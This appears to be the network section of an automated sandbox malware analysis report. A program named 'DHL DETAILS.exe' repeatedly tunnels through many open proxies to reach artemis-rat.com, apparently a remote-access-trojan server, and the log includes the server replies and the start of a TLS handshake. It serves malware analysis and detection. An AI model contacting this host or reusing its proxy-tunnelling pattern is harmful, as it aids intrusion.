                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    666192.168.2.551942138.36.150.1510806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.990628958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    667192.168.2.552011144.76.96.18055666352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.993115902 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.301839113 CET729INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                    Content-Type: text/html; charset=iso-8859-1
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69 67 75 72 65 20 79 6f 75 72 20 63 6c 69 65 6e 74 20 61 63 63 6f 72 64 69 6e 67 6c 79 2e 0a 3c 2f 70 3e 0a 3c 70 3e 0a 53 65 65 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 22 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 74 6f 72 70 72 6f 6a 65 63 74 2e 6f 72 67 2f 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 68 74 6d 6c 3c 2f 61 3e 20 66 6f 72 20 6d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 2e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 00
                                                                                    Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please configure your client accordingly.</p><p>See <a href="https://www.torproject.org/documentation.html">https://www.torproject.org/documentation.html</a> for more information.</p></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    668192.168.2.551973202.83.102.8380806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.994468927 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    669192.168.2.55219923.227.38.230806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:14.998043060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.152276993 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    670192.168.2.55204570.166.167.38577286352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.011890888 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    671192.168.2.552037198.105.100.15664076352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.012125015 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.423039913 CET459INHTTP/1.1 407 Proxy Authentication Required
                                                                                    Proxy-Authenticate: Basic realm="Invalid proxy credentials or missing IP Authorization."
                                                                                    Proxy-Connection: close
                                                                                    X-Webshare-Error: 407
                                                                                    X-Webshare-Reason: invalidpassword
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Length: 121
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Connection: close
                                                                                    Data Raw: 4e 6f 74 20 61 75 74 68 65 6e 74 69 63 61 74 65 64 20 6f 72 20 69 6e 76 61 6c 69 64 20 61 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 63 72 65 64 65 6e 74 69 61 6c 73 2e 20 4d 61 6b 65 20 73 75 72 65 20 74 6f 20 75 70 64 61 74 65 20 79 6f 75 72 20 70 72 6f 78 79 20 61 64 64 72 65 73 73 2c 20 70 72 6f 78 79 20 75 73 65 72 6e 61 6d 65 20 61 6e 64 20 70 6f 72 74 2e
                                                                                    Data Ascii: Not authenticated or invalid authentication credentials. Make sure to update your proxy address, proxy username and port.


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    672192.168.2.552061129.213.150.20580806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.012135983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    673192.168.2.55201343.128.107.25188886352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.036786079 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    674192.168.2.55209592.204.134.38511236352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.038203955 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.583071947 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.334012032 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:17.724430084 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    675192.168.2.551994103.76.148.9281816352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.038464069 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.829123020 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:16.974092960 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:21.200162888 CET19INHTTP/1.1 200 OK


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    676192.168.2.552027106.14.255.124806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.038676977 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.356607914 CET309INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.20.1
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 157
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.20.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    677192.168.2.551504162.223.94.164806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.097229958 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:23.454325914 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:23 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    678192.168.2.552232104.25.234.81806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.104106903 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.258636951 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    679192.168.2.552207142.4.123.41806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.105971098 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    680192.168.2.55204258.234.116.19781976352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.105978012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    681192.168.2.5520268.222.164.205156736352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.105978012 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    682192.168.2.55211498.162.25.4316546352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.106220961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    683192.168.2.55211998.162.25.29316796352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.108153105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    684192.168.2.552272104.18.103.125806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.110749006 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.265356064 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    685192.168.2.55145831.43.63.7041456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.111157894 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    686192.168.2.551972116.199.168.141456352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.111243010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    687192.168.2.552293104.17.132.79806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.111377001 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.266154051 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    688192.168.2.552236204.236.176.61806352C:\Users\user\Desktop\DHL DETAILS.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:15.111515999 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:15.285609961 CET116INHTTP/1.1 200 OK
                                                                                    Date: Sat, 09 Mar 2024 12:14:15 GMT
                                                                                    Server: nginx
                                                                                    Content-Type: text/plain
                                                                                    Content-Length: 0
                                                                                    Mar 9, 2024 13:14:15.287266016 CET369OUTData Raw: 16 03 03 01 6c 01 00 01 68 03 03 65 ec 52 95 15 f1 a5 75 d9 14 28 25 00 56 51 e4 57 67 6c fa 8e 41 ec 0c 1d e7 0b 33 12 1b 92 70 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                    Data Ascii: lheRu(%VQWglA3p*,+0/$#('=<5/artemis-rat.com#\8t[lG5>@<CIcjP~2dZll;/A]
                                                                                    Mar 9, 2024 13:14:15.462451935 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 0b 02 2b 42 15 7e b7 7b ec 0b df 62 e6 f7 b0 52 58 d1 13 6c 4e 98 c2 a9 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                    Data Ascii: =9+B~{bRXlNDOWNGRD0000*H010Uartemis-rat.com0240309115509Z260309115509Z010Uartemis-rat.com0"0*H0";dJJH
